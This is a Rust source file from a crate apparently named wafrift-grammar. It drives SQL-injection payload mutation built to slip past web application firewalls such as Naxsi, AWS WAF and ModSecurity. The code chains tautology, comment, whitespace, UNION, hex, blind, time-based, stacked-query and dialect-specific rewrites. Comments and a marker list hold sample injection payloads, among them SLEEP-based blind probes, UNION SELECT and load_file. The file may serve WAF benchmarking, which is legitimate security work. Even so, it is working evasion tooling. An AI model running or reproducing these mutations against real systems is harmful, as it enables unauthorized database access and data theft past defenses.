wafrift-grammar 0.2.16

//! SQL grammar-aware payload mutation.
//!
//! Understands SQL semantics and generates equivalent queries that look
//! different to regex-based WAF rules while preserving behavior.

use rand::Rng;

/// AST-level SQL metamorphism (sqlparser lift -> transform -> lower).
pub mod ast_metamorph;
/// Blind and time-based SQL mutation helpers.
pub mod blind;
/// Comment-based SQL mutation helpers.
pub mod comments;
/// Shared SQL mutation types and helpers.
pub mod common;
/// Keyword-free SQL mutation helpers for high-paranoia WAF bypass.
pub mod keywordless;
/// MSSQL dialect mutations.
pub mod mssql;
/// MySQL dialect mutations.
pub mod mysql;
/// Operator and delimiter SQL mutation helpers.
pub mod operators;
/// Oracle dialect mutations.
pub mod oracle;
/// PostgreSQL dialect mutations.
pub mod postgres;
/// Quote-free / comment-free rewrites for high-paranoia WAFs (Naxsi,
/// AWS WAF managed, modsec PL3+).
pub mod quote_free;
/// SQLite dialect mutations.
pub mod sqlite;
/// String and whitespace SQL mutation helpers.
pub mod strings;
/// Tautology SQL mutation helpers.
pub mod tautology;
/// UNION-specific SQL mutation helpers.
pub mod union;

pub use common::SqlMutation;

use crate::grammar::sql::blind::{
    boolean_blind_mutations, error_blind_mutations, json_xml_mutations, order_by_probes,
    stacked_query_mutations, time_blind_mutations,
};
use crate::grammar::sql::comments::{
    keyword_comment_mutations, nested_comment_mutations, version_comment_mutations,
};
use crate::grammar::sql::common::{
    COMMENT_TERMINATORS, WHITESPACE_ALTERNATIVES, and_alternatives, equality_alternatives,
    extract_quoted_string, or_alternatives,
};
use crate::grammar::sql::keywordless::keywordless_mutations;
use crate::grammar::sql::operators::{
    replace_comment_terminator, replace_equality, replace_logical_operator,
};
use crate::grammar::sql::strings::{hex_literal, no_space_wrap, split_string_concat};
use crate::grammar::sql::tautology::{TAUTOLOGIES, contains_tautology, replace_tautology};
use crate::grammar::sql::union::{
    UNION_ALTERNATIVES, replace_union, union_column_probes, union_mutations,
};

#[cfg(test)]
mod tests;

/// Generate grammar-aware mutations of a SQL injection payload.
///
/// Runs a fixed sequence of generators over `payload`, appending their
/// output to one shared list, then filters and truncates that list.
/// Generator order matters: every generator stops once the list holds
/// `max_mutations` entries, so earlier generators consume the budget
/// first.
///
/// Returns an empty vector when `payload` is empty or `max_mutations`
/// is zero; otherwise returns at most `max_mutations` entries. The
/// result is not deterministic: the combined-whitespace step draws from
/// `rand::thread_rng()`.
// The body is one long generator pipeline, hence the line-count allow.
#[allow(clippy::too_many_lines)]
#[must_use]
pub fn mutate(payload: &str, max_mutations: usize) -> Vec<SqlMutation> {
    if payload.is_empty() || max_mutations == 0 {
        return Vec::new();
    }

    let mut results = Vec::new();
    let mut rng = rand::thread_rng();
    // Lowercased once for the keyword presence checks further down.
    let lower = payload.to_ascii_lowercase();

    // Priority 1: quote-free / comment-free rewrites (Naxsi, AWS WAF
    // managed, modsec PL3+). Promoted ABOVE keywordless because high-
    // paranoia WAFs flag the math-only operator forms keywordless emits
    // (`1-1`, `+1+`) just as aggressively as quoted SQL — but they
    // pass clean integer-comparison forms (`1 OR 1=1`, `1 IS NOT NULL`)
    // through. Live-confirmed against wafrift-bench naxsi.
    extend_until_limit(
        &mut results,
        max_mutations,
        quote_free::mutations(payload, max_mutations / 3),
    );

    // Priority 2: keyword-free mutations (bypass PL2 WAFs).
    extend_until_limit(
        &mut results,
        max_mutations,
        keywordless_mutations(payload, max_mutations / 4),
    );

    // AST-level metamorphism: lift -> transform -> lower via sqlparser.
    // Yields semantic-identical fragments with different text signatures.
    extend_until_limit(
        &mut results,
        max_mutations,
        ast_metamorph::mutations(payload, max_mutations / 4),
    );

    // Tautology swap: try each known tautology in place of the one in
    // the payload, keeping only rewrites that actually changed the text.
    if contains_tautology(payload) {
        for tautology in TAUTOLOGIES {
            if results.len() >= max_mutations {
                break;
            }

            if let Some(mutated) = replace_tautology(payload, tautology)
                && mutated != payload
            {
                results.push(SqlMutation {
                    payload: mutated,
                    description: format!("tautology → {tautology}"),
                    rules_applied: vec!["tautology_swap"],
                });
            }
        }
    }

    // Comment-terminator swap: one variant per alternative terminator.
    for comment in COMMENT_TERMINATORS {
        if results.len() >= max_mutations {
            break;
        }

        if let Some(mutated) = replace_comment_terminator(payload, comment)
            && mutated != payload
        {
            results.push(SqlMutation {
                payload: mutated,
                description: format!("comment → {comment}"),
                rules_applied: vec!["comment_swap"],
            });
        }
    }

    // Logical-operator swap: at most one variant each for OR and AND.
    push_logical_operator_mutation(
        &mut results,
        payload,
        max_mutations,
        or_alternatives(),
        "or",
        "OR",
    );
    push_logical_operator_mutation(
        &mut results,
        payload,
        max_mutations,
        and_alternatives(),
        "and",
        "AND",
    );

    // Whitespace swap: replace every ASCII space with each alternative.
    // Index 0 is skipped — presumably the plain space itself; confirm
    // against `common::WHITESPACE_ALTERNATIVES`.
    for whitespace in &WHITESPACE_ALTERNATIVES[1..] {
        if results.len() >= max_mutations {
            break;
        }

        let mutated = payload.replace(' ', whitespace);
        if mutated != payload {
            results.push(SqlMutation {
                payload: mutated,
                description: format!("whitespace → {whitespace:?}"),
                rules_applied: vec!["whitespace_swap"],
            });
        }
    }

    // UNION keyword swap: only attempted when both `union` and `select`
    // occur somewhere in the payload (case-insensitive substring check).
    if lower.contains("union") && lower.contains("select") {
        for union_alternative in UNION_ALTERNATIVES {
            if results.len() >= max_mutations {
                break;
            }

            if let Some(mutated) = replace_union(payload, union_alternative)
                && mutated != payload
            {
                results.push(SqlMutation {
                    payload: mutated,
                    description: format!("UNION → {union_alternative}"),
                    rules_applied: vec!["union_swap"],
                });
            }
        }
    }

    // Equality swap: one variant per alternative spelling of `=`.
    for equality_alternative in equality_alternatives() {
        if results.len() >= max_mutations {
            break;
        }

        if let Some(mutated) = replace_equality(payload, equality_alternative)
            && mutated != payload
        {
            results.push(SqlMutation {
                payload: mutated,
                description: format!("= → {}", equality_alternative.trim()),
                rules_applied: vec!["equality_swap"],
            });
        }
    }

    // String-literal rewrites: split the quoted string into concatenated
    // pieces.
    if let Some(string_value) = extract_quoted_string(payload) {
        push_string_mutations(&mut results, payload, max_mutations, &string_value);
    }

    // Keyword and version comment wrapping (tagged `mysql_conditional` /
    // `mysql_version_conditional`).
    push_comment_keyword_mutations(&mut results, payload, max_mutations);

    // Hex literal: swap the quoted string for its hex-encoded form.
    if results.len() < max_mutations
        && let Some(string_value) = extract_quoted_string(payload)
    {
        let hex = hex_literal(&string_value);
        let mutated = payload.replace(&format!("'{string_value}'"), &hex);
        if mutated != payload {
            results.push(SqlMutation {
                payload: mutated,
                description: format!("hex literal: '{string_value}' → {hex}"),
                rules_applied: vec!["hex_literal"],
            });
        }
    }

    // Space-free form: pushed whenever `no_space_wrap` yields a rewrite
    // (no check here that it differs from the input).
    if results.len() < max_mutations
        && let Some(mutated) = no_space_wrap(payload)
    {
        results.push(SqlMutation {
            payload: mutated,
            description: "no-space: parenthesis wrapping instead of spaces".to_string(),
            rules_applied: vec!["no_space"],
        });
    }

    // ORDER BY probes: generated without reference to the payload text;
    // gated only on the payload mentioning `order by` or `union`.
    if lower.contains("order by") || lower.contains("union") {
        for probe in order_by_probes(10) {
            if results.len() >= max_mutations {
                break;
            }

            results.push(SqlMutation {
                payload: probe.clone(),
                description: format!("ORDER BY probe: {probe}"),
                rules_applied: vec!["order_by_probe"],
            });
        }
    }

    // Second-order variants: re-apply a random whitespace alternative to
    // randomly chosen mutations collected so far (the only RNG user).
    push_combined_whitespace_mutations(&mut results, max_mutations, &mut rng);
    // The remaining generators are each asked for up to `max_mutations`
    // entries; `extend_until_limit` enforces the shared cap.
    extend_until_limit(
        &mut results,
        max_mutations,
        time_blind_mutations(payload, max_mutations),
    );
    extend_until_limit(
        &mut results,
        max_mutations,
        stacked_query_mutations(payload, max_mutations),
    );

    // PostgreSQL dollar-quoting of the quoted string, plain and tagged.
    if results.len() < max_mutations
        && let Some(string_value) = extract_quoted_string(payload)
    {
        push_postgres_quote_mutations(&mut results, payload, max_mutations, &string_value);
    }

    // NOTE: `json_xml_mutations` receives no payload, so its output is
    // independent of the input; the anti-rig filter below exists to weed
    // such entries out for structured attacks.
    extend_until_limit(
        &mut results,
        max_mutations,
        json_xml_mutations(max_mutations),
    );
    extend_until_limit(
        &mut results,
        max_mutations,
        boolean_blind_mutations(payload, max_mutations),
    );
    extend_until_limit(
        &mut results,
        max_mutations,
        error_blind_mutations(payload, max_mutations),
    );
    extend_until_limit(
        &mut results,
        max_mutations,
        union_mutations(payload, max_mutations),
    );
    // Nested comment mutations — defeats WAFs that strip one comment layer
    for (mutated, desc) in nested_comment_mutations(payload, max_mutations) {
        if results.len() >= max_mutations {
            break;
        }
        results.push(SqlMutation {
            payload: mutated,
            description: desc,
            rules_applied: vec!["nested_comment"],
        });
    }
    // UNION column probes (only if payload contains UNION)
    if lower.contains("union") {
        extend_until_limit(&mut results, max_mutations, union_column_probes(10));
    }

    // Dialect-specific mutations are collected against an extended cap
    // (`max_mutations` plus 20%) so they can still be appended when the
    // base budget is already full. The final `truncate` below cuts the
    // list back to `max_mutations`, so entries beyond the base budget
    // only survive when the anti-rig filter removed earlier ones.
    let dialect_limit = max_mutations + max_mutations / 5;
    // `.max(5)` makes this at least 5, so the guard below always holds.
    let per_dialect = (max_mutations / 5).max(5);
    if per_dialect > 0 {
        extend_strings_until_limit(
            &mut results,
            dialect_limit,
            mysql::mutate(payload, per_dialect),
            "mysql",
        );
        extend_strings_until_limit(
            &mut results,
            dialect_limit,
            postgres::mutate(payload, per_dialect),
            "postgres",
        );
        extend_strings_until_limit(
            &mut results,
            dialect_limit,
            mssql::mutate(payload, per_dialect),
            "mssql",
        );
        extend_strings_until_limit(
            &mut results,
            dialect_limit,
            oracle::mutate(payload, per_dialect),
            "oracle",
        );
        extend_strings_until_limit(
            &mut results,
            dialect_limit,
            sqlite::mutate(payload, per_dialect),
            "sqlite",
        );
    }

    // ── Anti-rig chokepoint ──────────────────────────────────────────
    // A "mutation" of an attack must still BE that attack. Several
    // generators (json_xml, keywordless, canned-tautology, …) emit
    // fixed library payloads with ZERO relation to the input — so a
    // request to evade `1 AND extractvalue(...)` came back as
    // `' OR JSON_EXTRACT('{"a":1}','$.a')=1--`. That destroys the
    // exploit and is exactly what made the bench report fake bypasses.
    //
    // For a boolean tautology, a canned tautology IS equivalent — skip
    // the filter there (adversarial-twin: legit keyword-free rewrites
    // must survive). For any structured attack (UNION / error-based /
    // stacked / blind / time), every returned variant MUST still carry
    // at least one significant token of the original — checked after
    // stripping SQL comments so legitimate comment-injection evasions
    // (`extr/**/actvalue`) still pass.
    if is_structured_attack(payload) {
        let markers = significant_tokens(payload);
        // With no significant token in the original there is nothing to
        // compare against, so the list is left unfiltered.
        if !markers.is_empty() {
            results.retain(|m| {
                let norm = strip_sql_comments_ws(&m.payload);
                // Tokenise the variant the same way as the original:
                // ASCII-alphanumeric runs of at least four characters.
                let var_tokens: std::collections::HashSet<String> =
                    norm.split(|c: char| !c.is_ascii_alphanumeric())
                        .filter(|t| t.len() >= 4)
                        .map(str::to_ascii_lowercase)
                        .collect();
                markers.iter().any(|mk| var_tokens.contains(mk))
            });
        }
    }

    // Final truncate: dialect mutations are allowed to extend beyond base
    // budget during collection so each dialect gets a fair share, but the
    // public contract promises at most `max_mutations` results.
    results.truncate(max_mutations);
    results
}

/// Reports whether `payload` is a STRUCTURED attack — one with a data-
/// exfiltration or secondary effect (UNION read, error-based extract,
/// time/boolean blind, stacked statement, file/proc access) rather than
/// one that merely forces the WHERE clause true.
///
/// The anti-rig gate in `mutate` branches on this:
///   * structured → a canned substitution would discard the exploit
///     (`extractvalue(...)` or `UNION SELECT pw` turned into `1 OR 1=1`),
///     so every variant must keep a token of the original;
///   * not structured → a pure boolean tautology or an `'admin'--` auth
///     bypass may be swapped for any equivalent always-true expression,
///     so no preservation filter applies.
///
/// Detection is a substring scan of the comment-stripped, lowercased
/// payload against a fixed marker list. It replaces an earlier
/// `contains_tautology` substring check that misfired: the time-blind
/// `1 AND IF(1=1,SLEEP(5),0)` "contained `1=1`", was treated as a
/// tautology, and had its payload replaced by `'+0+'`.
pub(crate) fn is_structured_attack(payload: &str) -> bool {
    // Substrings whose presence marks the payload as structured.
    const MARKERS: &[&str] = &[
        "union", "select", "sleep(", "benchmark(", "waitfor", "extractvalue",
        "updatexml", "load_file", "into outfile", "into dumpfile", ";", "insert ",
        "update ", "delete ", "drop ", "exec ", "xp_", "sp_", "pg_sleep", "dbms_",
        "utl_", "case when", "regexp ", "rlike ", "@@", "0x", "char(", "chr(",
        "concat", "ascii(", "substring", "substr(", "hex(", "unhex(", "if(",
        "floor(", "rand(", "count(", "group by", "having ", "procedure ",
    ];

    let normalised = strip_sql_comments_ws(payload);
    for &marker in MARKERS {
        if normalised.contains(marker) {
            return true;
        }
    }
    false
}

/// Collects the payload's significant tokens: lowercase ASCII-
/// alphanumeric runs of at least four characters that contain at least
/// one letter, taken from the comment-stripped payload.
///
/// These are the attack's class-defining vocabulary (`extractvalue`,
/// `union`, `select`, `concat`, `sleep`, …). A real evasion keeps at
/// least one of them; a canned substitution carries none. Purely numeric
/// runs are excluded.
fn significant_tokens(payload: &str) -> std::collections::HashSet<String> {
    let normalised = strip_sql_comments_ws(payload);
    let mut tokens = std::collections::HashSet::new();

    for run in normalised.split(|c: char| !c.is_ascii_alphanumeric()) {
        if run.len() < 4 {
            continue;
        }
        // Runs are ASCII-only by construction, so a byte scan suffices.
        if run.bytes().any(|b| b.is_ascii_alphabetic()) {
            tokens.insert(run.to_ascii_lowercase());
        }
    }

    tokens
}

/// Lowercased copy with SQL comments removed and whitespace collapsed,
/// so comment-injection evasions (`UN/**/ION`) normalise back to the
/// keyword they evade rather than reading as a new token.
///
/// Three comment forms are removed:
///   * `/* … */`, including the MySQL `/*! … */` conditional; an
///     unterminated block comment swallows the rest of the input;
///   * `-- …` up to, but not including, the next `\n`;
///   * `# …` up to, but not including, the next `\n`.
///
/// Comments are deleted outright rather than replaced by a space, which
/// is what lets `UN/**/ION` rejoin into `union`.
///
/// Every run of whitespace that remains — including the newline that
/// ended a line comment — becomes a single ASCII space, so multi-word
/// markers such as `group by` match whatever separator the payload used
/// (`GROUP\tBY`, `GROUP  BY`). ASCII letters are lowercased; non-ASCII
/// characters are copied through unchanged.
fn strip_sql_comments_ws(s: &str) -> String {
    let bytes = s.as_bytes();
    let mut out = String::with_capacity(s.len());
    // Invariant: `i` always sits on a UTF-8 character boundary. Comment
    // delimiters are ASCII, and ordinary text advances a whole char.
    let mut i = 0;

    while i < bytes.len() {
        let rest = &bytes[i..];
        if rest.starts_with(b"/*") {
            // Jump past the closing `*/`, or to the end when unterminated.
            i = match s[i + 2..].find("*/") {
                Some(end) => i + 2 + end + 2,
                None => bytes.len(),
            };
        } else if rest.starts_with(b"--") || rest[0] == b'#' {
            // Line comment: stop ON the newline so it is handled as
            // ordinary whitespace on the next iteration.
            i = match s[i..].find('\n') {
                Some(end) => i + end,
                None => bytes.len(),
            };
        } else {
            // Decode a full character; pushing single bytes as `char`
            // would corrupt multi-byte UTF-8 sequences.
            let Some(ch) = s[i..].chars().next() else {
                break;
            };
            if ch.is_whitespace() {
                if !out.ends_with(' ') {
                    out.push(' ');
                }
            } else {
                out.push(ch.to_ascii_lowercase());
            }
            i += ch.len_utf8();
        }
    }

    out
}

/// Wraps raw dialect payload strings as `SqlMutation`s and appends them
/// to `results` until `results` holds `max_mutations` entries.
///
/// `dialect` is used both in the description text and as the single
/// entry of `rules_applied`. Nothing is appended when `results` is
/// already at or above the cap.
fn extend_strings_until_limit(
    results: &mut Vec<SqlMutation>,
    max_mutations: usize,
    strings: Vec<String>,
    dialect: &'static str,
) {
    let room = max_mutations.saturating_sub(results.len());
    let wrapped = strings.into_iter().take(room).map(|payload| SqlMutation {
        payload,
        description: format!("{dialect} dialect mutation"),
        rules_applied: vec![dialect],
    });
    results.extend(wrapped);
}

/// Appends at most one logical-operator rewrite of `payload`.
///
/// `target` and `alternatives` are forwarded to
/// `replace_logical_operator`; `label` only appears in the description.
/// The rewrite is dropped when `results` is already full or when it is
/// identical to the input.
fn push_logical_operator_mutation(
    results: &mut Vec<SqlMutation>,
    payload: &str,
    max_mutations: usize,
    alternatives: &[String],
    target: &str,
    label: &str,
) {
    // The replacement is attempted first, before the budget is checked.
    let Some(rewritten) = replace_logical_operator(payload, alternatives, target) else {
        return;
    };
    if results.len() >= max_mutations || rewritten == payload {
        return;
    }

    results.push(SqlMutation {
        payload: rewritten,
        description: format!("{label} keyword alternative"),
        rules_applied: vec!["logical_op_swap"],
    });
}

/// Appends one mutation per concatenation split of `string_value`,
/// each replacing the quoted literal `'string_value'` in `payload`,
/// until `results` holds `max_mutations` entries.
fn push_string_mutations(
    results: &mut Vec<SqlMutation>,
    payload: &str,
    max_mutations: usize,
    string_value: &str,
) {
    let splits = split_string_concat(string_value);
    let room = max_mutations.saturating_sub(results.len());
    // The quoted form being replaced is the same for every split.
    let quoted = format!("'{string_value}'");

    results.extend(splits.into_iter().take(room).map(|split| SqlMutation {
        payload: payload.replace(&quoted, &split),
        description: format!("string split: '{string_value}' → {split}"),
        rules_applied: vec!["string_split"],
    }));
}

/// Appends keyword-comment mutations, then version-comment mutations,
/// of `payload` to `results`, never growing it past `max_mutations`.
///
/// Each generator is asked for as many entries as are still free. The
/// free count uses a saturating subtraction, so a list that is already
/// over budget yields a request for zero entries instead of an unsigned
/// underflow (a panic in debug builds, a huge wrapped count in release).
fn push_comment_keyword_mutations(
    results: &mut Vec<SqlMutation>,
    payload: &str,
    max_mutations: usize,
) {
    let keyword_budget = max_mutations.saturating_sub(results.len());
    for (mutated, description) in keyword_comment_mutations(payload, keyword_budget) {
        // Guard independently of the generator honouring its budget.
        if results.len() >= max_mutations {
            break;
        }

        results.push(SqlMutation {
            payload: mutated,
            description,
            rules_applied: vec!["mysql_conditional"],
        });
    }

    // Recomputed: the first loop may have used up part of the budget.
    let version_budget = max_mutations.saturating_sub(results.len());
    for (mutated, description) in version_comment_mutations(payload, version_budget) {
        if results.len() >= max_mutations {
            break;
        }

        results.push(SqlMutation {
            payload: mutated,
            description,
            rules_applied: vec!["mysql_version_conditional"],
        });
    }
}

/// Appends up to five second-order variants, each made by taking a
/// randomly chosen entry already in `results` and replacing its ASCII
/// spaces with a randomly chosen whitespace alternative (index 0 of
/// `WHITESPACE_ALTERNATIVES` is never picked).
///
/// Does nothing when `results` is empty or already full. An attempt
/// whose replacement leaves the payload unchanged is skipped but still
/// counts against the attempt budget. Entries added here can themselves
/// be picked as the base of a later attempt.
fn push_combined_whitespace_mutations(
    results: &mut Vec<SqlMutation>,
    max_mutations: usize,
    rng: &mut impl Rng,
) {
    if results.is_empty() || results.len() >= max_mutations {
        return;
    }

    // Fixed up front: the number of attempts does not grow with the list.
    let attempts = (max_mutations - results.len()).min(5);
    for _ in 0..attempts {
        // Draw order (base entry first, then whitespace) is kept stable.
        let pick = rng.r#gen_range(0..results.len());
        let ws_pick = rng.r#gen_range(1..WHITESPACE_ALTERNATIVES.len());
        let substitute = WHITESPACE_ALTERNATIVES[ws_pick];

        let base = &results[pick];
        let rewritten = base.payload.replace(' ', substitute);
        if rewritten == base.payload {
            continue;
        }

        let mut rules_applied = base.rules_applied.clone();
        rules_applied.push("combined_whitespace");
        let description = format!(
            "combined: {} + whitespace {:?}",
            base.description, substitute
        );

        results.push(SqlMutation {
            payload: rewritten,
            description,
            rules_applied,
        });
    }
}

/// Appends up to two PostgreSQL dollar-quoted rewrites of `payload`:
/// the quoted literal `'string_value'` replaced by `$$string_value$$`,
/// then by `$tag$string_value$tag$`.
///
/// Each rewrite is attempted only while `results` is below
/// `max_mutations`, and is kept only if it differs from `payload`.
fn push_postgres_quote_mutations(
    results: &mut Vec<SqlMutation>,
    payload: &str,
    max_mutations: usize,
    string_value: &str,
) {
    let quoted = format!("'{string_value}'");
    // (replacement text, description, rule tag), in emission order.
    let variants = [
        (
            format!("$${string_value}$$"),
            format!("PG dollar-sign quoting: '{string_value}' → $${string_value}$$"),
            "pg_dollar_quote",
        ),
        (
            format!("$tag${string_value}$tag$"),
            format!("PG tagged dollar-sign: '{string_value}' → $tag${string_value}$tag$"),
            "pg_dollar_quote_tagged",
        ),
    ];

    for (replacement, description, rule) in variants {
        if results.len() >= max_mutations {
            return;
        }
        let rewritten = payload.replace(&quoted, &replacement);
        if rewritten != payload {
            results.push(SqlMutation {
                payload: rewritten,
                description,
                rules_applied: vec![rule],
            });
        }
    }
}

/// Moves entries from `mutations` into `results`, in order, until
/// `results` holds `max_mutations` entries; the remainder is dropped.
/// Nothing is appended when `results` is already at or above the cap.
fn extend_until_limit(
    results: &mut Vec<SqlMutation>,
    max_mutations: usize,
    mutations: Vec<SqlMutation>,
) {
    let room = max_mutations.saturating_sub(results.len());
    results.extend(mutations.into_iter().take(room));
}